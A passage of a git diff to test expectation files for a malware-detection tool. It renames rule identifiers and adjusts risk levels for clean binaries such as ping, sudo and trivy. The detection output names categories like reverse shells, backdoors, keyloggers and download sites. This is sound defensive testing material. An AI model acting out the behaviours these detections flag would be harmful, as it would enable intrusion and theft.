[discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index 9a3b9ab45..c5f8863cc 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md @@ -3,14 +3,14 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Port](https://github.com/search?q=Port&type=code) | +| MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | -| MEDIUM | [discover/system/network](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/system_network.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) | | MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping statistics ---](https://github.com/search?q=ping+statistics+---&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code)
[inet_ntop](https://github.com/search?q=inet_ntop&type=code) | | MEDIUM | [net/socket/raw](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/raw.yara#raw_sockets) | [send raw and/or malformed IP packets](https://man7.org/linux/man-pages/man7/raw.7.html) | [SOCK_RAW](https://github.com/search?q=SOCK_RAW&type=code)
[raw socket](https://github.com/search?q=raw+socket&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | | LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | | LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) |
diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple
index e1f07cb35..287705b9f 100644
--- a/tests/linux/clean/pulumi.simple
+++ b/tests/linux/clean/pulumi.simple
@@ -40,8 +40,8 @@ discover/group/lookup: medium
 discover/network/mac_address: medium
 discover/process/parent: low
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
diff --git a/tests/linux/clean/pypi_package_index.json.simple b/tests/linux/clean/pypi_package_index.json.simple
index e75f5caf3..cb5c63bb8 100644
--- a/tests/linux/clean/pypi_package_index.json.simple
+++ b/tests/linux/clean/pypi_package_index.json.simple
@@ -101,7 +101,7 @@ discover/network/interface_list: medium
 discover/network/netstat: medium
 discover/processes/list: medium
 discover/processes/pgrep: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
 discover/system/machine_id: low
 discover/system/platform: low
 discover/system/sysinfo: medium
diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md
index d59d71b9d..94ebbe1ec 100644
--- a/tests/linux/clean/qemu-system-xtensa.md
+++ b/tests/linux/clean/qemu-system-xtensa.md
@@ -59,6 +59,7 @@
 | LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) |
 | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) |
 | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
+| LOW | [discover/system/dmesg](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg) | accesses the kernel log ring buffer | [dmesg](https://github.com/search?q=dmesg&type=code) |
 | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) |
 | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) |
diff --git a/tests/linux/clean/rules.json.simple b/tests/linux/clean/rules.json.simple
index c8ae90917..6e31704e3 100644
--- a/tests/linux/clean/rules.json.simple
+++ b/tests/linux/clean/rules.json.simple
@@ -21,7 +21,8 @@ data/compression/bzip2: low
 data/compression/lzma: low
 data/compression/zstd: low
 data/encoding/base64: low
-discover/system/network: medium
+discover/multiple: medium
+discover/system/dmesg: low
 discover/system/platform: low
 discover/user/name_get: medium
 evasion/bypass_security/linux/iptables: medium
diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple
index 38d2ee056..61d126494 100644
--- a/tests/linux/clean/searchindex.json.simple
+++ b/tests/linux/clean/searchindex.json.simple
@@ -1,4 +1,4 @@
-# linux/clean/searchindex.json: high
+# linux/clean/searchindex.json: medium
 3P/threat_hunting/dd: medium
 3P/threat_hunting/keylogger: medium
 anti-static/obfuscation/obfuscate: low
@@ -40,7 +40,7 @@ fs/watch: low
 impact/exploit: medium
 impact/infection/infected: medium
 impact/remote_access/agent: medium
-impact/remote_access/backdoor: high
+impact/remote_access/backdoor: medium
 impact/remote_access/reverse_shell: medium
 impact/remote_access/trojan: medium
 impact/rootkit: medium
diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md
index d21573c90..961ab3556 100644
--- a/tests/linux/clean/slack.md
+++ b/tests/linux/clean/slack.md
@@ -106,9 +106,9 @@
 | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) |
 | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) |
 | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) |
-| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
 | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
-| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
 | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) |
diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple
index 29b5561f0..f64d4c66c 100644
--- a/tests/linux/clean/slirp4netns.simple
+++ b/tests/linux/clean/slirp4netns.simple
@@ -10,7 +10,7 @@ discover/group/lookup: medium
 discover/network/interface_list: medium
 discover/network/mac_address: medium
 discover/process/parent: low
-discover/system/dev_full: medium
+discover/system/dev_full: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple
index 11c1f7965..e1de0184e 100644
--- a/tests/linux/clean/sudo.simple
+++ b/tests/linux/clean/sudo.simple
@@ -2,8 +2,8 @@
 credential/password: low
 discover/network/interface_list: medium
 discover/process/parent: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/user/HOME: low
 evasion/file/location/var_tmp: medium
 evasion/file/prefix: medium
diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple
index c75e6ce7c..90b8d4846 100644
--- a/tests/linux/clean/trivy.simple
+++ b/tests/linux/clean/trivy.simple
@@ -55,8 +55,9 @@ discover/network/mac_address: medium
 discover/network/netstat: medium
 discover/process/name: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md
index 84d5c2ff3..8389c0d6f 100644
--- a/tests/linux/clean/trufflehog.md
+++ b/tests/linux/clean/trufflehog.md
@@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|-------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | 
[https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) |
+| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [https://api.mesibo.com/api.php?op=useradd&token=https](https://api.mesibo.com/api.php?op=useradd&token=https)
[https://api.route4me.com/api.v4/address_book.php?api_key=https](https://api.route4me.com/api.v4/address_book.php?api_key=https)
[https://api.websitepulse.com/textserver.php?method=GetContacts&username=](https://api.websitepulse.com/textserver.php?method=GetContacts&username=)
[https://us1.locationiq.com/v1/reverse.php?key=https](https://us1.locationiq.com/v1/reverse.php?key=https) |
 | HIGH | [c2/tool_transfer/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/download.yara#download_sites) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [pastebin.Scanner](https://github.com/search?q=pastebin.Scanner&type=code)
[pastebin.com/api/api_post](https://github.com/search?q=pastebin.com%2Fapi%2Fapi_post&type=code)
[pastebin.go](https://github.com/search?q=pastebin.go&type=code)
[pastebin.init](https://github.com/search?q=pastebin.init&type=code) |
 | HIGH | [c2/tool_transfer/grayware](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/grayware.yara#grayware_sites) | References websites that host code that can be used maliciously | [shodan.io](https://github.com/search?q=shodan.io&type=code) |
 | HIGH | [discover/ip/public](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/ip/public_ip.yara#iplookup_website) | public service to discover external IP address | [ipify.or](https://github.com/search?q=ipify.or&type=code) |
@@ -116,8 +116,8 @@
 | LOW | [discover/cloud/google_metadata](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-metadata.yara#google_metadata) | Includes the token required to use the Google Cloud Platform metadata server | [Metadata-Flavor](https://github.com/search?q=Metadata-Flavor&type=code) |
 | LOW | [discover/cloud/google_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/cloud/google-storage.yara#go_import) | Capable of using Google Cloud Storage (GCS) | [cloud.google.com/go/storage](https://github.com/search?q=cloud.google.com%2Fgo%2Fstorage&type=code) |
 | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
-| LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) |
-| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) |
+| LOW | [discover/system/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) |
+| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | 
[/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) |
 | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) |
 | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple
index b0708c44b..519799bc3 100644
--- a/tests/linux/clean/wolfictl.simple
+++ b/tests/linux/clean/wolfictl.simple
@@ -45,8 +45,9 @@ discover/network/interface_list: medium
 discover/network/mac_address: medium
 discover/network/netstat: medium
 discover/processes/pgrep: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/system/sysinfo: medium
 discover/user/HOME: low
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff
index 4103bb6b07683ee18884603a1261365db3b59e05..a7aea48048a772c5b09cbd65156b2810978f8887 100644
GIT binary patch delta 33 pcmaE}jp@xcrVUcDlc&dtPEJTPo}3oTKe;m2Y+?Y%=Jm0AZ2|n;4mtn; delta 36 qcmaE}jp@xcrVUcDEb-~7C6g!G+fR;+m0-~YaSCJ2Hm{G}YYPAw3=Y=-
diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
index 61fe8e8c7..db9788ce8 100644
--- a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff
@@ -37,7 +37,7 @@
 | +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) |
 | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) |
 | +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) |
-| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
 | +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
 | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
diff --git a/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff
index 4103bb6b07683ee18884603a1261365db3b59e05..a7aea48048a772c5b09cbd65156b2810978f8887 100644
GIT binary patch delta 33 pcmaE}jp@xcrVUcDlc&dtPEJTPo}3oTKe;m2Y+?Y%=Jm0AZ2|n;4mtn; delta 36 qcmaE}jp@xcrVUcDEb-~7C6g!G+fR;+m0-~YaSCJ2Hm{G}YYPAw3=Y=-
diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
index 61fe8e8c7..db9788ce8 100644
--- a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff
@@ -37,7 +37,7 @@
 | +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) |
 | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) |
 | +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) |
-| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
 | +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
 | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) |
diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
index 61fe8e8c7..db9788ce8 100644
--- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
+++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff
@@ -37,7 +37,7 @@
 | +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) |
 | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) |
 | +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) |
-| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
 | +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
 | +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
